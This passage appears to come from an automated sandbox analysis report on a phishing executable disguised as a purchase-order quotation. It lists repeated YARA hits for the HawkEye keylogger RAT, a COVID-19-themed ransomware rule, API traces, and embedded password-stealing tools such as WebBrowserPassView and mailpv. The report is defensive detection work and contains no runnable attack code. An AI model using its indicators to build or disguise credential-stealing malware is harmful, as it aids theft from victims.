              Source: 8.2.WindowsUpdate.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 8.2.WindowsUpdate.exe.1ee00000.5.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 8.2.WindowsUpdate.exe.1ee00000.5.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 8.2.WindowsUpdate.exe.1c5f0000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 8.2.WindowsUpdate.exe.1c5f0000.4.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 11.2.WindowsUpdate.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 11.2.WindowsUpdate.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 11.2.WindowsUpdate.exe.1eed0000.5.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 11.2.WindowsUpdate.exe.1eed0000.5.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 11.2.WindowsUpdate.exe.1c5f0000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 11.2.WindowsUpdate.exe.1c5f0000.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 8.2.WindowsUpdate.exe.1ee00000.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 8.2.WindowsUpdate.exe.1ee00000.5.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Initial sample is a PE file and has a suspicious name
              Source: initial sample; Static PE information: Filename: PO 2010029_pdf Quotation from Alibaba Ale.exe
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: 3_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary
              Source: unknown; Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2216
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe; Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: WindowsUpdate.exe.0.dr; Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe; Binary or memory string: OriginalFilename vs PO 2010029_pdf Quotation from Alibaba Ale.exe
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe; Binary or memory string: OriginalFileName vs PO 2010029_pdf Quotation from Alibaba Ale.exe
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.321027884.0000000021BD0000.00000004.00000001.sdmp; Binary or memory string: OriginalFilenameCMemoryExecute.dll@ vs PO 2010029_pdf Quotation from Alibaba Ale.exe
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.304520747.000000001B140000.00000002.00000001.sdmp; Binary or memory string: OriginalFilenamemscorrc.dllT vs PO 2010029_pdf Quotation from Alibaba Ale.exe
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.316835361.000000001DCF1000.00000004.00000001.sdmp; Binary or memory string: OriginalFilenameWebBrowserPassView.exeF vs PO 2010029_pdf Quotation from Alibaba Ale.exe
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.316835361.000000001DCF1000.00000004.00000001.sdmp; Binary or memory string: OriginalFilenamemailpv.exe< vs PO 2010029_pdf Quotation from Alibaba Ale.exe
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.316835361.000000001DCF1000.00000004.00000001.sdmp; Binary or memory string: OriginalFilenamePhulli.exe0 vs PO 2010029_pdf Quotation from Alibaba Ale.exe
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.320060762.0000000021310000.00000002.00000001.sdmp; Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs PO 2010029_pdf Quotation from Alibaba Ale.exe
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe; Section loaded: security.dll
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe; Section loaded: security.dll
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe; Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
              Source: 00000008.00000002.308445225.000000001EE00000.00000004.00000001.sdmp, type: MEMORY; Matched rule: RAT_HawkEye (date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye)
              Source: 00000008.00000002.308445225.000000001EE00000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Hawkeye (author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research)
              Source: 00000008.00000002.305904316.000000001C5F0000.00000004.00000001.sdmp, type: MEMORY; Matched rule: RAT_HawkEye (date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye)
              Source: 00000008.00000002.305904316.000000001C5F0000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Hawkeye (author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research)
              Source: 00000008.00000002.308219748.000000001DBD1000.00000004.00000001.sdmp, type: MEMORY; Matched rule: RAT_HawkEye (date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye)
              Source: 00000008.00000002.308219748.000000001DBD1000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Hawkeye (author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research)
              Source: 0000000B.00000002.312787394.000000001EE40000.00000004.00000001.sdmp, type: MEMORY; Matched rule: RAT_HawkEye (date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye)
              Source: 0000000B.00000002.312787394.000000001EE40000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Hawkeye (author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research)
              Source: 0000000B.00000002.312583133.000000001DCB1000.00000004.00000001.sdmp, type: MEMORY; Matched rule: RAT_HawkEye (date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye)
              Source: 0000000B.00000002.312583133.000000001DCB1000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Hawkeye (author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research)
              Source: 0000000B.00000002.301969493.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: RAT_HawkEye (date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye)
              Source: 0000000B.00000002.301969493.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Hawkeye (author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research)
              Source: 00000008.00000002.300925836.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: RAT_HawkEye (date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye)
              Source: 00000008.00000002.300925836.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Hawkeye (author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research)
              Source: 0000000B.00000002.312957269.000000001EED2000.00000040.00000001.sdmp, type: MEMORY; Matched rule: RAT_HawkEye (date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye)
              Source: 0000000B.00000002.312957269.000000001EED2000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Hawkeye (author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research)
              Source: 00000000.00000002.316835361.000000001DCF1000.00000004.00000001.sdmp, type: MEMORY; Matched rule: RAT_HawkEye (date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye)
              Source: 00000000.00000002.316835361.000000001DCF1000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Hawkeye (author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research)
              Source: 00000000.00000002.301261564.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: RAT_HawkEye (date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye)
              Source: 00000000.00000002.301261564.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Hawkeye (author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research)
              Source: 00000000.00000002.317001771.000000001EEAE000.00000004.00000001.sdmp, type: MEMORY; Matched rule: RAT_HawkEye (date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye)
              Source: 00000000.00000002.317001771.000000001EEAE000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Hawkeye (author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research)
              Source: 00000000.00000002.317140638.000000001EFE2000.00000040.00000001.sdmp, type: MEMORY; Matched rule: RAT_HawkEye (date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye)
              Source: 00000000.00000002.317140638.000000001EFE2000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Hawkeye (author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research)
              Source: 00000000.00000002.317057911.000000001EF40000.00000004.00000001.sdmp, type: MEMORY; Matched rule: RAT_HawkEye (date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye)
              Source: 00000000.00000002.317057911.000000001EF40000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Hawkeye (author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research)
              Source: 00000000.00000002.311897650.000000001C6F0000.00000004.00000001.sdmp, type: MEMORY; Matched rule: RAT_HawkEye (date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye)
              Source: 00000000.00000002.311897650.000000001C6F0000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Hawkeye (author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research)
              Source: 0000000B.00000002.309857450.000000001C5F0000.00000004.00000001.sdmp, type: MEMORY; Matched rule: RAT_HawkEye (date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye)
              Source: 0000000B.00000002.309857450.000000001C5F0000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Hawkeye (author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research)
              Source: 00000008.00000002.305233571.000000001AD92000.00000040.00000001.sdmp, type: MEMORY; Matched rule: RAT_HawkEye (date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye)
              Source: 00000008.00000002.305233571.000000001AD92000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Hawkeye (author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research)
              Source: 00000000.00000002.313417162.000000001CCF1000.00000004.00000001.sdmp, type: MEMORY; Matched rule: RAT_HawkEye (date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye)
              Source: 00000000.00000002.313417162.000000001CCF1000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Hawkeye (author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research)
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.ad0000.1.unpack, type: UNPACKEDPE; Matched rule: MAL_RANSOM_COVID19_Apr20_1 (date = 2020-04-15, hash1 = 2779863a173ff975148cb3156ee593cb5719a0ab238ea7c9e0b0ca3b5a4a9326, author = Florian Roth, description = Detects ransomware distributed in COVID-19 theme, reference = https://unit42.paloaltonetworks.com/covid-19-themed-cyber-attacks-target-government-and-medical-organizations/)
              Source: 11.2.WindowsUpdate.exe.1c5f0000.3.unpack, type: UNPACKEDPE; Matched rule: RAT_HawkEye (date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye)
              Source: 11.2.WindowsUpdate.exe.1c5f0000.3.unpack, type: UNPACKEDPE; Matched rule: Hawkeye (author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research)
              Source: 11.2.WindowsUpdate.exe.ed0000.1.unpack, type: UNPACKEDPE; Matched rule: MAL_RANSOM_COVID19_Apr20_1 (date = 2020-04-15, hash1 = 2779863a173ff975148cb3156ee593cb5719a0ab238ea7c9e0b0ca3b5a4a9326, author = Florian Roth, description = Detects ransomware distributed in COVID-19 theme, reference = https://unit42.paloaltonetworks.com/covid-19-themed-cyber-attacks-target-government-and-medical-organizations/)
              Source: 8.2.WindowsUpdate.exe.ed0000.1.unpack, type: UNPACKEDPE; Matched rule: MAL_RANSOM_COVID19_Apr20_1 (date = 2020-04-15, hash1 = 2779863a173ff975148cb3156ee593cb5719a0ab238ea7c9e0b0ca3b5a4a9326, author = Florian Roth, description = Detects ransomware distributed in COVID-19 theme, reference = https://unit42.paloaltonetworks.com/covid-19-themed-cyber-attacks-target-government-and-medical-organizations/)
              Source: 8.0.WindowsUpdate.exe.ed0000.0.unpack, type: UNPACKEDPE; Matched rule: MAL_RANSOM_COVID19_Apr20_1 (date = 2020-04-15, hash1 = 2779863a173ff975148cb3156ee593cb5719a0ab238ea7c9e0b0ca3b5a4a9326, author = Florian Roth, description = Detects ransomware distributed in COVID-19 theme, reference = https://unit42.paloaltonetworks.com/covid-19-themed-cyber-attacks-target-government-and-medical-organizations/)
              Source: 0.0.PO 2010029_pdf Quotation from Alibaba Ale.exe.ad0000.0.unpack, type: UNPACKEDPE; Matched rule: MAL_RANSOM_COVID19_Apr20_1 (date = 2020-04-15, hash1 = 2779863a173ff975148cb3156ee593cb5719a0ab238ea7c9e0b0ca3b5a4a9326, author = Florian Roth, description = Detects ransomware distributed in COVID-19 theme, reference = https://unit42.paloaltonetworks.com/covid-19-themed-cyber-attacks-target-government-and-medical-organizations/)
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1efe0000.6.unpack, type: UNPACKEDPE; Matched rule: RAT_HawkEye (date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye)
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1efe0000.6.unpack, type: UNPACKEDPE; Matched rule: Hawkeye (author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research)
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1c6f0000.4.raw.unpack, type: UNPACKEDPE; Matched rule: RAT_HawkEye (date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye)
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1c6f0000.4.raw.unpack, type: UNPACKEDPE; Matched rule: Hawkeye (author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research)
              Source: 8.2.WindowsUpdate.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: RAT_HawkEye (date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye)
              Source: 8.2.WindowsUpdate.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Hawkeye (author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research)
              Source: 11.2.WindowsUpdate.exe.1ee40000.4.unpack, type: UNPACKEDPE; Matched rule: RAT_HawkEye (date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye)
              Source: 8.2.WindowsUpdate.exe.1ad90000.2.unpack, type: UNPACKEDPE; Matched rule: RAT_HawkEye (date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye)
              Source: 11.2.WindowsUpdate.exe.1ee40000.4.unpack, type: UNPACKEDPE; Matched rule: Hawkeye (author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research)
              Source: 8.2.WindowsUpdate.exe.1ad90000.2.unpack, type: UNPACKEDPE; Matched rule: Hawkeye (author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research)
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1ef40000.5.unpack, type: UNPACKEDPE; Matched rule: RAT_HawkEye (date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye)
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1ef40000.5.unpack, type: UNPACKEDPE; Matched rule: Hawkeye (author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research)
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1c6f0000.4.unpack, type: UNPACKEDPE; Matched rule: RAT_HawkEye (date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye)
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1c6f0000.4.unpack, type: UNPACKEDPE; Matched rule: Hawkeye (author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research)
              Source: 11.2.WindowsUpdate.exe.1ee40000.4.raw.unpack, type: UNPACKEDPE; Matched rule: RAT_HawkEye (date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye)
              Source: 11.2.WindowsUpdate.exe.1ee40000.4.raw.unpack, type: UNPACKEDPE; Matched rule: Hawkeye (author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research)
              Source: 11.2.WindowsUpdate.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: RAT_HawkEye (date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye)
              Source: 11.2.WindowsUpdate.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Hawkeye (author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research)
              Source: 11.0.WindowsUpdate.exe.ed0000.0.unpack, type: UNPACKEDPE; Matched rule: MAL_RANSOM_COVID19_Apr20_1 (date = 2020-04-15, hash1 = 2779863a173ff975148cb3156ee593cb5719a0ab238ea7c9e0b0ca3b5a4a9326, author = Florian Roth, description = Detects ransomware distributed in COVID-19 theme, reference = https://unit42.paloaltonetworks.com/covid-19-themed-cyber-attacks-target-government-and-medical-organizations/)
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1ef40000.5.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1ef40000.5.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 8.2.WindowsUpdate.exe.1c5f0000.4.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
              Source: 8.2.WindowsUpdate.exe.1c5f0000.4.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 8.2.WindowsUpdate.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
              Source: 8.2.WindowsUpdate.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 8.2.WindowsUpdate.exe.1ee00000.5.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
              Source: 8.2.WindowsUpdate.exe.1ee00000.5.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 8.2.WindowsUpdate.exe.1c5f0000.4.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
              Source: 8.2.WindowsUpdate.exe.1c5f0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 11.2.WindowsUpdate.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
              Source: 11.2.WindowsUpdate.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 11.2.WindowsUpdate.exe.1eed0000.5.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
              Source: 11.2.WindowsUpdate.exe.1eed0000.5.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 11.2.WindowsUpdate.exe.1c5f0000.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
              Source: 11.2.WindowsUpdate.exe.1c5f0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 8.2.WindowsUpdate.exe.1ee00000.5.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
              Source: 8.2.WindowsUpdate.exe.1ee00000.5.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1efe0000.6.unpack, Form1.cs | Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock' (reported three times)
Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1efe0000.6.unpack, Form1.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 8.2.WindowsUpdate.exe.1ad90000.2.unpack, Form1.cs | Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock' (reported three times)
Source: 8.2.WindowsUpdate.exe.1ad90000.2.unpack, Form1.cs | Cryptographic APIs: 'CreateDecryptor'
Source: classification engine | Classification label: mal100.phis.troj.spyw.evad.winEXE@10/13@1/3
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function 3_2_00415AFD: GetLastError, FormatMessageW, FormatMessageA, LocalFree, free
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function 3_2_00415F87: GetDiskFreeSpaceW, GetDiskFreeSpaceA, free
